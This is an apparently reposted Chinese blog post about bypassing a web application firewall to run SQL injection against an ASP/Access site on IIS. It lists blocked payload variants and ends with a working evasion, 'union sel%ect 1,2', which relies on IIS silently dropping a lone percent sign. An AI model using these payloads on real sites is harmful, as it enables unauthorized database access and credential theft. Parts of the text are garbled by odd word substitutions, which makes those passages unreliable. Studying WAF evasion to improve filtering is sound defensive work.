环境：asp+access+iis

周末有个不知名的小伙伴叫我资助绕下waf，看了下有点意思。

先简单看看拦截什么 
union select 1,2 拦截 
union%0aselect 1,2 拦截 
union%0as%u0065lect 1,2 拦截 
参数污染 id=86 union&id=s%u0065lect 1,2 也拦截

iis一个特性碰到单一的百分号(%)会忽略失。 
也就是说s%elect == select 
但是颠末fuzz如下： 
union s%elect 1,2 还是拦截

union 1,2 不拦截

也就是说我们需要绕过select

union s%e%l%e%c%t 1,2拦截

我扶了扶我不存在的眼镜框，然后继续fuzz。 
编故事编的我本身都有点累的，颠末重复fuzz，发此刻中间打断即可。 
union sel%ect 1,2 不拦截，想知道为什么吗？我特么知道我就不用在fuzz了。

代码层有个很掉常的过滤，过滤了很多对象，这个站并不是我的方针，我的方针就bypass waf，因为各种原因就不射出打点员暗码了。

注：这文章写了好久了，不知道是否还能bypass，空话很多，也感谢感动你们看到这里，主要说个过程。